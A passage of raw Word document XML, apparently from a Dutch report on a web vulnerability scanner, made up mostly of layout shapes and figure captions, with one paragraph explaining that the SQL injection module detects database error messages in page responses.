                <wp:docPr id="214" name="Rectangle 21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B048" id="Rectangle 214" o:spid="_x0000_s1026" style="position:absolute;margin-left:374.15pt;margin-top:69.3pt;width:64.3pt;height:9.2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Pwm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2240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48477BEC" wp14:editId="6B192802">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4751705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1110615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="218" name="Rectangle 218"/>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22231" id="Rectangle 218" o:spid="_x0000_s1026" style="position:absolute;margin-left:374.15pt;margin-top:87.45pt;width:64.3pt;height:9.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1IK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6096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50AB0261" wp14:editId="3F20B7B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4116705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>542925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="568960" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="15240" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21214" y="21680"/>
                    <wp:lineTo x="21214" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="189" name="Rectangle 189"/>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90AA" id="Rectangle 189" o:spid="_x0000_s1026" style="position:absolute;margin-left:324.15pt;margin-top:42.75pt;width:44.8pt;height:53.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4048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FC7C3CF" wp14:editId="653472A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4119245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>312420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21788" y="24000"/>
                    <wp:lineTo x="21788" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="186" name="Rectangle 186"/>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2FDB9" id="Rectangle 186" o:spid="_x0000_s1026" style="position:absolute;margin-left:324.35pt;margin-top:24.6pt;width:115pt;height:9pt;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Xrs3I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3024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C69054E" wp14:editId="281F0041">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3994150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="1143000"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21760" y="21600"/>
                    <wp:lineTo x="21760" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="185" name="Rectangle 185"/>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E4822" id="Rectangle 185" o:spid="_x0000_s1026" style="position:absolute;margin-left:314.5pt;margin-top:15.5pt;width:135pt;height:90pt;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4q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" filled="f" strokecolor="#ffd966" strokeweight="2.25pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25BEBC" w14:textId="4B6EA6CB" w:rsidR="00DF0FBB" w:rsidRPr="00D13927" w:rsidRDefault="00AF12F4" w:rsidP="00245D9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253206528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F0193A8" wp14:editId="018AC94B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4352925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="791" name="Text Box 791"/>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37D9A" w14:textId="4458EC6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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193A8" id="Text Box 791" o:spid="_x0000_s1131" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.8pt;margin-top:342.75pt;width:105pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C737D9A" w14:textId="4458EC6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252738560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CF03183" wp14:editId="14D40153">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-267970</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2520950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="5080" b="762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3205504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68412308" wp14:editId="299E8B01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1038225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="790" name="Text Box 790"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="889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E72BF" w14:textId="424763B4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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12308" id="Text Box 790" o:spid="_x0000_s1132" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.8pt;margin-top:81.75pt;width:70pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="717E72BF" w14:textId="424763B4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.14</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B25291">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252724224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="790B5D5E" wp14:editId="650CFA10">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-203200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1497330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6096000" cy="917575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="598" name="Text Box 598"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6096000" cy="917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7B713" w14:textId="596874CD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>H</w:t>
                            </w:r>
                            <w:r w:rsidR="002441C9">
                              <w:t>et controleren van de HTML-</w:t>
                            </w:r>
                            <w:r>
                              <w:t>pagina’s is v</w:t>
                            </w:r>
                            <w:r w:rsidR="00805C12">
                              <w:t>oor ieder module anders. De SQL</w:t>
                            </w:r>
                            <w:r w:rsidR="00F77F5F">
                              <w:t>i</w:t>
                            </w:r>
                            <w:r w:rsidR="00805C12">
                              <w:t>-</w:t>
                            </w:r>
                            <w:r>
                              <w:t>module controleert op database errors van meerdere DBMS. Hiervoor heb ik een lijst gemaakt met SQL errors die corresponderen met de SQL</w:t>
                            </w:r>
                            <w:r w:rsidR="00C71081">
                              <w:t>i</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> payload. Met andere woorden als een payload ee</w:t>
                            </w:r>
                            <w:r w:rsidR="00805C12">
                              <w:t>n error veroorzaakt op een HTML-</w:t>
                            </w:r>
                            <w:r>
                              <w:t>pagina dan is het één van deze errors, je kunt het zien als de error scope die ik bepaald heb voor deze scan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B5D5E" id="Text Box 598" o:spid="_x0000_s1133" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16pt;margin-top:117.9pt;width:480pt;height:72.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B77B713" w14:textId="596874CD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>H</w:t>
                      </w:r>
                      <w:r w:rsidR="002441C9">
                        <w:t>et controleren van de HTML-</w:t>
                      </w:r>
                      <w:r>
                        <w:t>pagina’s is v</w:t>
                      </w:r>
                      <w:r w:rsidR="00805C12">
                        <w:t>oor ieder module anders. De SQL</w:t>
                      </w:r>
                      <w:r w:rsidR="00F77F5F">
                        <w:t>i</w:t>
                      </w:r>
                      <w:r w:rsidR="00805C12">
                        <w:t>-</w:t>
                      </w:r>
                      <w:r>
                        <w:t>module controleert op database errors van meerdere DBMS. Hiervoor heb ik een lijst gemaakt met SQL errors die corresponderen met de SQL</w:t>
                      </w:r>
                      <w:r w:rsidR="00C71081">
                        <w:t>i</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> payload. Met andere woorden als een payload ee</w:t>
                      </w:r>
                      <w:r w:rsidR="00805C12">
                        <w:t>n error veroorzaakt op een HTML-</w:t>
                      </w:r>
                      <w:r>
                        <w:t>pagina dan is het één van deze errors, je kunt het zien als de error scope die ik bepaald heb voor deze scanmodule.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00614978">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252686336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FB78C62" wp14:editId="31BAD7E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2524760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508635" cy="22860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5086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DB931" w14:textId="325E9EB7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>10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78C62" id="Text Box 236" o:spid="_x0000_s1134" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:198.8pt;margin-top:27.55pt;width:40.05pt;height:18p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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="553DB931" w14:textId="325E9EB7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>10 sec</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00614978">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252685312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F5F611F" wp14:editId="67F9024B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2089785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>241300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377825" cy="377825"/>
            <wp:effectExtent l="0" t="0" r="3175" b="317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lock.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7825" cy="377825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00663B82">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252689408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C99DF36" wp14:editId="56D9E77D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>934085</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>57848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238" name="Chevron 23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E1DBB" id="Chevron 238" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:73.55pt;margin-top:45.55pt;width:30pt;height:36pt;rotation:180;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" adj="10800" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00663B82">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252684288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="496A140D" wp14:editId="00928400">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1388745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>695960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="233" name="Text Box 233"/>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34EDC5A" w14:textId="65B03404" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0039403A">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140D" id="Text Box 233" o:spid="_x0000_s1135" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:109.35pt;margin-top:54.8pt;width:184.55pt;height:17.7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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="034EDC5A" w14:textId="65B03404" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0039403A">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Response</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DF0FBB" w:rsidRPr="00E3311A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EA413" w14:textId="708A1EA4" w:rsidR="0083347D" w:rsidRDefault="001E678B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252746752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="629CC417" wp14:editId="03E921B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900497</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-901098</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="609" name="Rectangle 60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7C910" id="Rectangle 609" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.9pt;width:25pt;height:1031.7pt;z-index:-2505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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E3DDD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252739584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="295270B4" wp14:editId="43E12FBD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2023745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>471170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="384175" cy="384175"/>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error ic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4175" cy="384175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000E3DDD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252740608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D17AA04" wp14:editId="2DC97133">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2400935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>584200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="605" name="Text Box 605"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="889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20C711" w14:textId="2566770F" w:rsidR="002A05E5" w:rsidRPr="000070E1" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000070E1">
                              <w:rPr>
                                <w:b/>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AA04" id="Text Box 605" o:spid="_x0000_s1136" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:189.05pt;margin-top:46pt;width:70pt;height:17.8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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4220C711" w14:textId="2566770F" w:rsidR="002A05E5" w:rsidRPr="000070E1" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000070E1">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Error</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31392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B0B2DA8" wp14:editId="608FBFAE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4057650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>21590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="1143000"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21760" y="21600"/>
                    <wp:lineTo x="21760" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="249" name="Rectangle 249"/>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29FDA" id="Rectangle 249" o:spid="_x0000_s1026" style="position:absolute;margin-left:319.5pt;margin-top:1.7pt;width:135pt;height:90pt;z-index:25273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QJLZ8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" filled="f" strokecolor="#ffd966" strokeweight="2.25pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0083347D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252732416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EAC0F94" wp14:editId="6FE9347E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4182745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>137160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21788" y="24000"/>
                    <wp:lineTo x="21788" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="250" name="Rectangle 250"/>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CB892" id="Rectangle 250" o:spid="_x0000_s1026" style="position:absolute;margin-left:329.35pt;margin-top:10.8pt;width:115pt;height:9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3440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F086249" wp14:editId="05E6521F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4180205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>367665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="568960" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="15240" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21214" y="21680"/>
                    <wp:lineTo x="21214" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="251" name="Rectangle 251"/>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1E5F" id="Rectangle 251" o:spid="_x0000_s1026" style="position:absolute;margin-left:329.15pt;margin-top:28.95pt;width:44.8pt;height:53.8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4464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B69D863" wp14:editId="410C09F2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4819650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>365125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21843"/>
                    <wp:lineTo x="21499" y="21843"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="252" name="Rectangle 252"/>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42739" id="Rectangle 252" o:spid="_x0000_s1026" style="position:absolute;margin-left:379.5pt;margin-top:28.75pt;width:64.3pt;height:17.8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5488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35EE972B" wp14:editId="2CF7FF5B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4815205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>704850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="253" name="Rectangle 253"/>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265C" id="Rectangle 253" o:spid="_x0000_s1026" style="position:absolute;margin-left:379.15pt;margin-top:55.5pt;width:64.3pt;height:9.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6512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73EFFB99" wp14:editId="244CAF90">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4815205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>935355</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
